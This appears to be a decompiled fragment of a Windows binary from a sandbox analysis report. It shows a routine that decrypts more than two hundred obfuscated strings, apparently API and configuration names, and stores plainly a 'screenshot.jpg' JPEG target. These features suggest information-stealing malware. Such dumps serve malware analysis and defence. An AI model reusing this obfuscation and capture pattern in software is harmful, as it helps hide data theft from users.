				 *0x432450 = E00422F70(_t406, _t408, _t409, _t815, "f7c89U34QSGBoEeazohtkbM=");
				 *0x4324cc = E00422F70(_t406, _t408, _t409, _t815, "D4cg9U0=");
				 *0x4320ec = E00422F70(_t406, _t408, _t409, _t815, "HpowgGXmPQ==");
				 *0x4322a0 = E00422F70(_t406, _t408, _t409, _t815, "f7cb9U0=");
				 *0x43244c = E00422F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsQpxicKRA62INwTXO4U8rGFe+/xcxt5W6YEp9tVY78V1/wg==");
				 *0x432678 = E00422F70(_t406, _t408, _t409, _t815, "HroQoEXGHQu/6EY=");
				 *0x432418 = E00422F70(_t406, _t408, _t409, _t815, "HroQoEXGHRO791CshII=");
				 *0x4325ac = E00422F70(_t406, _t408, _t409, _t815, "f6BGtA==");
				 *0x4320d0 = L"image/jpeg";
				 *0x4322ac = L"screenshot.jpg";
				 *0x4322cc = E00422F70(_t406, _t408, _t409, _t815, "dbBDpEjUDy636U/lxJxb0PfN3vCWNZB+dbhSuBsiomacwW5lQ1L7ojV4/Yi6YDUz+hgt/VVn");
				 *0x432634 = E00422F70(_t406, _t408, _t409, _t815, "Ob4H/kzfAQ==");
				 *0x4325e0 = E00422F70(_t406, _t408, _t409, _t815, "a5EmlhnmUXKcwBL026p2gOHf+w==");
				 *0x432134 = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGia7FC1hJ9bwL6H1OqQc5p+eeZT+UowuWDS8kcgUV35");
				 *0x432174 = E00422F70(_t406, _t408, _t409, _t815, "Bg==");
				 *0x432118 = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGiK/FOg0cw=");
				 *0x4323c0 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTXmWq4FuxxIRG2bvEmrHAZZlld6pD8VE/rTjR/xE0UTH1tEh4uYuWUHZwvUwh6lI81sjT3mFxrCKMR/mkkmErqTH1snSaa0clJsU5bs3y+E9jIXwea+q9dKC/1aJkPR24SpV9osRp/QOvBSlongy5bLQjerS2RJc=");
				 *0x4320f8 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTSQm/60SwiotXjveaz/3iQNl+YfBGpQ5/u2zZ/RE0UTH1tQ==");
				 *0x432448 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTSQa25FG2jpgIlL6b1f2ILcA1OfobuEsl5G2EvwowGGf2vFJ0+NHdTSIj8gk=");
				 *0x4324a8 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTSUWw5kyhgoJVjveM37bcdIFpOOtQ4lchrmDEvk0/BXH3rQ08vZWSVWtq8Bhivk0ung==");
				 *0x432250 = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGiK/FOg0cxfwbuc06DRZ4EjcqRF9RM14zTdqAonA3S16QUqocY=");
				_t218 = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGiS4E2in4QIlA=="); // executed
				 *0x4325fc = _t218;
				 *0x4320c4 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jolDXECo=");
				 *0x432190 = E00422F70(_t406, _t408, _t409, _t815, "cKQCvAOJZCSq");
				 *0x4322e4 = E00422F70(_t406, _t408, _t409, _t815, "MbYao13IFiA=");
				 *0x4325e8 = E00422F70(_t406, _t408, _t409, _t815, "PrYFsVzLEBqp5E+pjpg=");
				 *0x43263c = E00422F70(_t406, _t408, _t409, _t815, "P6sMtFzUSiax60XrgZ9d2g==");
				 *0x432384 = E00422F70(_t406, _t408, _t409, _t815, "LboNtEbQSTaq5FegxYZB27k=");
				 *0x432464 = E00422F70(_t406, _t408, _t409, _t815, "KrIQo1nPFiSt4A2vmINc");
				 *0x4325f8 = E00422F70(_t406, _t408, _t409, _t815, "KbYGtAfUASax");
				 *0x432614 = E00422F70(_t406, _t408, _t409, _t815, "M70FvwfUASax");
				 *0x4324e8 = E00422F70(_t406, _t408, _t409, _t815, "N6YPpEDDCyK7q1Skh4BXwA==");
				 *0x4321dc = E00422F70(_t406, _t408, _t409, _t815, "cA==");
				 *0x43211c = E00422F70(_t406, _t408, _t409, _t815, "Bo8huV3ECyyw2X8=");
				 *0x432680 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mpEHCFiCr6H+Z");
				 *0x432620 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6A==");
				_t233 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6H+ZnI1e2LKcyYzs"); // executed
				 *0x432610 = _t233;
				 *0x432344 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6A6Jv68=");
				 *0x432290 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6A6Jv69u6KCJ1rzVYYZQSA==");
				 *0x432194 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDex62CkmIQ=");
				 *0x432328 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDex62CkmIRu6KCJ1rzVYYZQSA==");
				 *0x432144 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mqEbDETaC2Q==");
				 *0x432478 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mqEbDETaC2Ua9hIhHx/mf27zccIFQSA==");
				 *0x432430 = E00422F70(_t406, _t408, _t409, _t815, "Bo8upUXTDQGx4kaZtw==");
				 *0x4326a4 = E00422F70(_t406, _t408, _t409, _t815, "Bo85s0jUDBmC");
				 *0x432630 = E00422F70(_t406, _t408, _t409, _t815, "Bo8nsVrPJyqs4H+Z");
				 *0x4323e0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8vuV3CByq363+Z");
				 *0x43269c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ivkbJByq363+Z");
				 *0x432510 = E00422F70(_t406, _t408, _t409, _t815, "Bo8hknjkCyyw2X8=");
				 *0x432484 = E00422F70(_t406, _t408, _t409, _t815, "Bo8HtV/ECyyw2X8=");
				 *0x432698 = E00422F70(_t406, _t408, _t409, _t815, "Bo8HuU7OECSy5kyshbBu");
				 *0x432518 = E00422F70(_t406, _t408, _t409, _t815, "Bo8lvEbVDSu96kqrt7A=");
				 *0x43234c = E00422F70(_t406, _t408, _t409, _t815, "Bo8lokjJDyqC2Q==");
				 *0x432238 = E00422F70(_t406, _t408, _t409, _t815, "Bo8lokzOByq363+Z");
				 *0x432414 = E00422F70(_t406, _t408, _t409, _t815, "Bo8kv0XDJyq362SJrw==");
				 *0x43216c = E00422F70(_t406, _t408, _t409, _t815, "Bo8kv0XDJyq36wPtrKB2nYu0");
				 *0x43268c = E00422F70(_t406, _t408, _t409, _t815, "Bo8qvk/OCiyq4ECqgoJu6A==");
				 *0x432654 = E00422F70(_t406, _t408, _t409, _t815, "Bo8qn2rIDSuC2Q==");
				 *0x4320c0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8qqErIDSuC2Q==");
				 *0x4321ac = E00422F70(_t406, _t408, _t409, _t815, "Bo8utU7GByq363+Z");
				 *0x432530 = E00422F70(_t406, _t408, _t409, _t815, "Bo8uuUfECyyw2X8=");
				 *0x432380 = E00422F70(_t406, _t408, _t409, _t815, "Bo8tsUTCByq363+Z");
				 *0x43209c = E00422F70(_t406, _t408, _t409, _t815, "Bo8zokDKASax7E2Ztw==");
				 *0x4320cc = E00422F70(_t406, _t408, _t409, _t815, "Bo83tVvVBSax7E2Ztw==");
				 *0x432180 = E00422F70(_t406, _t408, _t409, _t815, "Bo86kWrIDSuC2Q==");
				 *0x432300 = E00422F70(_t406, _t408, _t409, _t815, "Bo8JsVHfOBk=");
				 *0x432130 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jv0SJCCy84FGxksJY1a+Q5oz5e5FpbK5T3HwN3ibV/08aMzH15Ao8vYODWHtx8lQt81l/ysL77w==");
				 *0x432560 = E00422F70(_t406, _t408, _t409, _t815, "KbsPp0jXDWu66U8=");
				 *0x432318 = E00422F70(_t406, _t408, _t409, _t815, "OLARqVnTSiGy6Q==");
				 *0x4322dc = E00422F70(_t406, _t408, _t409, _t815, "LboNuUfCEGu66U8=");
				 *0x4321d8 = E00422F70(_t406, _t408, _t409, _t815, "OaEaoF2UVmu66U8=");
				 *0x432234 = E00422F70(_t406, _t408, _t409, _t815, "KqACoECJZCmy");
				 *0x43262c = E00422F70(_t406, _t408, _t409, _t815, "Nb8G4xuJZCmy");
				 *0x43221c = E00422F70(_t406, _t408, _t409, _t815, "KbsGvEWUVmu66U8=");
				 *0x4325dc = E00422F70(_t406, _t408, _t409, _t815, "O7cVsVnOV3fw4U+p");
				 *0x432364 = E00422F70(_t406, _t408, _t409, _t815, "PbcKoEXSF2u66U8=");
				 *0x432160 = E00422F70(_t406, _t408, _t409, _t815, "PbcK4xuJZCmy");
				 *0x432108 = E00422F70(_t406, _t408, _t409, _t815, "L6AGohqVSiGy6Q==");
				 *0x432204 = E00422F70(_t406, _t408, _t409, _t815, "FrwCtGXOBje/91qE");
				 *0x432438 = E00422F70(_t406, _t408, _t409, _t815, "HbYXgFvIBwS64VGgmJ8=");
				 *0x4326e8 = E00422F70(_t406, _t408, _t409, _t815, "H6sKpHnVCya79lA=");
				 *0x432540 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhVrCFgG740Kwh5h+1bmP85Q=");
				 *0x4324b4 = E00422F70(_t406, _t408, _t409, _t815, "HLoNtG/OFjaqw0qpjq0=");
				 *0x4320e0 = E00422F70(_t406, _t408, _t409, _t815, "HrYPtV3CIiyy4GI=");
				 *0x432554 = E00422F70(_t406, _t408, _t409, _t815, "HLoNtGfCHDGY7E+gqg==");
				 *0x432274 = E00422F70(_t406, _t408, _t409, _t815, "HLoNtGrLCza7");
				 *0x4325cc = E00422F70(_t406, _t408, _t409, _t815, "HbYXg1DUECCzzE2jhA==");
				 *0x4320dc = E00422F70(_t406, _t408, _t409, _t815, "Hb8MskjLKSCz6lG8uJhTwKKb/6g=");
				 *0x4326c8 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk0bKFDCq4FGLioFX9Q==");
				 *0x43213c = E00422F70(_t406, _t408, _t409, _t815, "E6A0v16RUBWs6kCgmJ8=");
				 *0x432230 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8XO3hI9Xx6Q=");
				 *0x432218 = E00422F70(_t406, _t408, _t409, _t815, "HbYXnEbEBSmK7E6g");
				 *0x4326c0 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhEDKAR+x60aMhYpdxrqJzrnfew==");
				 *0x4322fc = E00422F70(_t406, _t408, _t409, _t815, "HbYXg1DUECCz1Uyyjp5hwLacz6M=");
				 *0x432580 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhVrCFgG740Kwh5h+27SJ1rX+dJhp");
				 *0x4323dc = E00422F70(_t406, _t408, _t409, _t815, "DboHtWrPBTeK6m6wh5hb9q6c3w==");
				 *0x43245c = E00422F70(_t406, _t408, _t409, _t815, "FaMGvnnVCya79lA=");
				 *0x432270 = E00422F70(_t406, _t408, _t409, _t815, "Gb8Mo0zvBSu66UY=");
				 *0x4321e8 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8XO3hI9Xx6Sh3g==");
				 *0x4323d4 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8WesmYlRwLiaw5E=");
				 *0x43238c = E00422F70(_t406, _t408, _t409, _t815, "CLYOv1/CICys4ECxhJ5L9Q==");
				 *0x4324e4 = E00422F70(_t406, _t408, _t409, _t815, "CbYXk1zVFiCw8WesmYlRwLiaw5E=");
				 *0x432500 = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CICys4ECxhJ5L9Q==");
				 *0x432340 = E00422F70(_t406, _t408, _t409, _t815, "HKEGtWXOBje/91o=");
				 *0x432628 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlUfRDTex606ghZhk1aWB27LccLQ=");
				 *0x43257c = E00422F70(_t406, _t408, _t409, _t815, "HbYXgFvOEiSq4HO3hIpb2LK737PEfJpiWqpa/U0Q");
				 *0x43237c = E00422F70(_t406, _t408, _t409, _t815, "GbwTqW/OCCCf");
				 *0x43249c = E00422F70(_t406, _t408, _t409, _t815, "CbYXlkDLARWx7E2xjp4=");
				 *0x432314 = E00422F70(_t406, _t408, _t409, _t815, "ErYCoGjLCCq9");
				 *0x432648 = E00422F70(_t406, _t408, _t409, _t815, "HbYXgFvIByCt9mugipw=");
				 *0x4325d8 = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CIiyy4GI=");
				 *0x43255c = E00422F70(_t406, _t408, _t409, _t815, "DaEKpEzhDSm7");
				 *0x4324e0 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlkDLARa3/0aAkw==");
				 *0x43267c = E00422F70(_t406, _t408, _t409, _t815, "NqAXokrGEAQ=");
				 *0x43217c = E00422F70(_t406, _t408, _t409, _t815, "FrxjsUXmCCmx5g==");
				 *0x4322b0 = E00422F70(_t406, _t408, _t409, _t815, "Hb8MskjLIje74A==");
				 *0x4325c4 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlkDLARa3/0Y=");
				 *0x4326d0 = E00422F70(_t406, _t408, _t409, _t815, "CLYCtG/OCCA=");
				 *0x4321fc = E00422F70(_t406, _t408, _t409, _t815, "HbYXhkzVFyyx62a9vA==");
				 *0x4325a4 = E00422F70(_t406, _t408, _t409, _t815, "CbYXlUfRDTex606ghZhk1aWB27LccLQ=");
				 *0x4323f4 = E00422F70(_t406, _t408, _t409, _t815, "F7IThkDCEwq4w0qpjg==");
				 *0x4323ec = E00422F70(_t406, _t408, _t409, _t815, "D70OsVnxDSCpykWDgoBX");
				 *0x4322c8 = E00422F70(_t406, _t408, _t409, _t815, "CaoQpEzKMCyz4HeqrYVe0YOB17U=");
				 *0x43266c = E00422F70(_t406, _t408, _t409, _t815, "HbYXhEDEDwax8E2x");
				 *0x4320ac = E00422F70(_t406, _t408, _t409, _t815, "HLoPtX3OCSCK6nC8mJhX2YOB17U=");
				 *0x43218c = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CIiyy4G6km5xb2rCp");
				 *0x4321b8 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlkDLAQyw40y3ho1G3biG+Kn4dJtoeK4=");
				 *0x432330 = E00422F70(_t406, _t408, _t409, _t815, "HqYTvEDEBTG7zUKrj4BX");
				 *0x432124 = E00422F70(_t406, _t408, _t409, _t815, "FrxjsUXhFiC7");
				 *0x432428 = E00422F70(_t406, _t408, _t409, _t815, "HbYXnEbEBSm7zE2jhK0=");
				 *0x432150 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTJymx9kaEh4tdxr6c0r3gZ5p6fa9S6g==");
				 *0x432668 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTICCt8VGqkqdXzQ==");
				 *0x4324a4 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTKzW762KpjINA3aOA14DCeoNlcK5F");
				 *0x43233c = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTNyCq1VGqm4lAwK4=");
				 *0x4324b0 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTIyCw4FGkn4lhzbqF36TCfJZHcbI=");
				 *0x432110 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTICC991q1nw==");
				 *0x432424 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGN4FeKm5hb27mp");
				 *0x4324fc = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGM4EKhrYVe0Q==");
				 *0x4326b4 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGN4FeDgoBX5LiB1KTVZw==");
				 *0x432454 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGR9Uarqg==");
				 *0x43226c = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGd6k2rjo9G9Q==");
				 *0x4324c0 = E00422F70(_t406, _t408, _t409, _t815, "EqcXoGbXASuM4FKwjp9G9Q==");
				 *0x4323ac = E00422F70(_t406, _t408, _t409, _t815, "EqcXoHjSATenzE2jhK0=");
				 *0x43225c = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGd6Uy2jqRT2rOE3w==");
				 *0x4324f0 = E00422F70(_t406, _t408, _t409, _t815, "EqcXoHrCCiGM4FKwjp9G9Q==");
				 *0x43265c = E00422F70(_t406, _t408, _t409, _t815, "EqcXoGjDZBe79FagmJh60baM36LDVA==");
				 *0x432280 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGR9Uarvp5e9Q==");
				 *0x43232c = E00422F70(_t406, _t408, _t409, _t815, "GaEaoF3yCjWs6legiJh21aOJ");
				 *0x432114 = E00422F70(_t406, _t408, _t409, _t815, "GaEaoF30EDe360SRhK5b2raaw5E=");
				 *0x432378 = E00422F70(_t406, _t408, _t409, _t815, "HbYXnUbDESm7w0qpjqJT2bKtwpE=");
				 *0x432470 = E00422F70(_t406, _t408, _t409, _t815, "GbwgokzGECCX61CxioJR0Q==");
				 *0x432308 = E00422F70(_t406, _t408, _t409, _t815, "Gbw2vkDJDTG35E+skYk=");
				 *0x43227c = E00422F70(_t406, _t408, _t409, _t815, "CZsktV3hCym64FGVipha9Q==");
				 *0x4326b0 = E00422F70(_t406, _t408, _t409, _t815, "CbsGvEXiHCC98Fegqg==");
				 *0x43210c = E00422F70(_t406, _t408, _t409, _t815, "CZsluUXCKzW790KxgoNc9Q==");
				 *0x43261c = E00422F70(_t406, _t408, _t409, _t815, "CLYEn1nCCg67/Ga9qg==");
				 *0x4324c8 = E00422F70(_t406, _t408, _t409, _t815, "CLYEgVzCFjyI5E+wjqlK9Q==");
				 *0x4321b4 = E00422F70(_t406, _t408, _t409, _t815, "CLYEk0XIFyCV4Fo=");
				 *0x432528 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhVrCFgu/6EaE");
				 *0x432674 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8Wuyu55d0r6E35E=");
				 *0x43222c = E00422F70(_t406, _t408, _t409, _t815, "CLYElUfSCQ67/Ga9qg==");
				 *0x43212c = E00422F70(_t406, _t408, _t409, _t815, "CrIXuGTGECa21lOgiK0=");
				 *0x4323a4 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoG7CEAyz5ESgroJR27ONyKPjfI9p");
				 *0x4322a4 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoG7CEAyz5ESgroJR27ONyKM=");
				 *0x4322f8 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoGrVASSq4GGsn4FTxJGa1b34V7xYWYpn");
				_t362 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoHrGEiCX6EKijrhd8r6E3w=="); // executed
				 *0x432214 = _t362;
				 *0x43219c = E00422F70(_t406, _t408, _t409, _t815, "HbcKoEXSFxaq5FGxnpw=");
				 *0x432490 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoEXSFxa28FehhJtc");
				 *0x4326dc = E00422F70(_t406, _t408, _t409, _t815, "HbcKoHrGEiCX6EKijrhd56Oa37Hd");
				 *0x432360 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoG3OFzWx9kaMho1V0Q==");
				 *0x432468 = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CIAaf");
				 *0x4321c8 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlEzRDSa7xkK1mA==");
				 *0x432278 = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CJyqz9UKxgo5e0ZWBzr3RZQ==");
				 *0x4326bc = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CJyqz9UKxgo5e0ZOr");
				 *0x4322c0 = E00422F70(_t406, _t408, _t409, _t815, "GLoXkkXT");
				 *0x4325a0 = E00422F70(_t406, _t408, _t409, _t815, "CbYPtUrTKye04ECx");
				 *0x432264 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlGDlDTGt");
				 *0x432578 = E00422F70(_t406, _t408, _t409, _t815, "HrYPtV3CKye04ECx");
				 *0x4324ac = E00422F70(_t406, _t408, _t409, _t815, "H70WvW3OFzWy5FqBjppb17Kb+w==");
				 *0x432304 = E00422F70(_t406, _t408, _t409, _t815, "LaATokDJECOf");
				 *0x4323cc = E00422F70(_t406, _t408, _t409, _t815, "CLYPtUjUAQGd");
				 *0x43229c = E00422F70(_t406, _t408, _t409, _t815, "HbYXg1DUECCzyEaxmYVRxw==");
				 *0x4325c0 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlGo=");
				 *0x432590 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlEzUDzGx9XSshYhdww==");
				 *0x432584 = E00422F70(_t406, _t408, _t409, _t815, "HbYXm0zeBiq/90eJipVdwaOk06PE");
				 *0x432498 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4f1hzg0F83HmS1+TI9qoiPU3FPgG8h61h82dOH/mgppy6HAreq31M5rm38r2fTJnIUF9AzJ87u+FsTXVoGfuG3NKyK77d3Y0Waa7Zi7tgirlvqDHtaihTSc64pO73EWOc27iB1i8Gn+doEP6p/Uw==");
				 *0x432588 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4f1hzg0F83HmS1+TI9qoiPU3FPgG8h61h82dOH/mgppy6HAreq31M5rm38r2fTJnIUF9AzJ87u+FsTXVoGfuG3NKyK77d3Y0Waa7Zi7tgirlvqDHtaihTSc64pO73EWOc27iB1i8Gn+doEP6p/UA==");
				 *0x4325bc = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4f1hzg0F83HmS1+TI9qoiPU3FPgG8h61h82dOH/mgppy6HAreq31M5rm38r2fTJnIUF9AzJ87u+FsTXVoGfuG3NKyK77d3Y0Waa7Zi7tgirlvqDHtaihTSc64pO73EWOc27iB1i8Gn+doEP6p/UQ==");
				 *0x4320bc = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4f1hzg0F83HmS1+TI9qoiPU3FPgG8h61h82dOH/mgppy6HAreq31M5rm38r2fTJnIUF9AzJ87u+FsTXVoGfuG3NKyK77d3Y0Waa7Zi7tgirlvqDHtaihTSc64pO73EWOc27iB1i8Gn+doEP6p/Vg==");
				 *0x432210 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgsW6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBj");
				 *0x432658 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgsW6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBg");
				 *0x432644 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgsW6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBh");
				 *0x432184 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgsW6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBm");
				 *0x432420 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtm6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBj");
				 *0x4326ac = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtm6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBg");
				 *0x432298 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtm6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBh");
				_t393 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtm6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBm"); // executed
				 *0x4322d8 = _t393;
				 *0x432460 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgt26Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBj");
				 *0x432624 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgt26Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBg");
				 *0x432604 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgt26Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBh");
				 *0x432388 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgt26Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBm");
				 *0x432688 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtG6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBj");
				 *0x432524 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtG6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBg");
				 *0x4321a0 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtG6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBh");
				 *0x4325b4 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsWpNqfahSxGJgtG6Mz3YKGXW34gszhKe2TnB1tVQt9mBP4dXT32I1vxO8Uur6ykMKii6x7SCHeh8sdOBkeeayrRl/NVdBS7vubPGK7750ZEDpHcBm");
				 *0x4325b0 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4c5zPP8k0sAmb73hE6q4KVSHp+gGQY91N1x8zCwFEG7XzXXpqLuTB4/S207SLSeGxwf+NscZayqWp9QCNFPbuEB/fmg750ZEDo");
				 *0x4326a8 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4c5zPP8k0sAmb73hE6q4KVSHp+gGQY91N1x8zCwFEG7XzXXpqLuTB4/S207SLSeGxwf+NscZayqWp9QCNFPbuEB/fmg750ZEDr");
				 *0x4325ec = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4c5zPP8k0sAmb73hE6q4KVSHp+gGQY91N1x8zCwFEG7XzXXpqLuTB4/S207SLSeGxwf+NscZayqWp9QCNFPbuEB/fmg750ZEDq");
				_t405 = E00422F70(_t406, _t408, _t409, _t815, "CbwFpF7GFiCC2W6siJ5dx7iOzozsQpxicKRA6x4c5zPP8k0sAmb73hE6q4KVSHp+gGQY91N1x8zCwFEG7XzXXpqLuTB4/S207SLSeGxwf+NscZayqWp9QCNFPbuEB/fmg750ZEDt");
				 *0x4320a8 = _t405;
				return _t405;
			}

0x00423053
0x00423054
0x00423057
0x00423061
0x00423066
0x0042306e
0x00423080
0x00423092
0x004230a4
0x004230b6
0x004230c8
0x004230da
0x004230ec
0x004230fe
0x00423110
0x00423122
0x00423134
0x00423146
0x00423158
0x0042316a
0x0042317c
0x0042318e
0x004231a0
0x004231b2
0x004231c4
0x004231d6
0x004231e8
0x004231fa
0x0042320c
0x0042321e
0x00423230
0x00423242
0x00423254
0x00423266
0x00423278
0x0042328a
0x0042329c
0x004232ae
0x004232c0
0x004232d2
0x004232e4
0x004232ee
0x004232f6
0x00423308
0x0042331a
0x0042332c
0x0042333e
0x00423350
0x00423362
0x00423374
0x00423386
0x00423398
0x004233aa
0x004233bc
0x004233ce
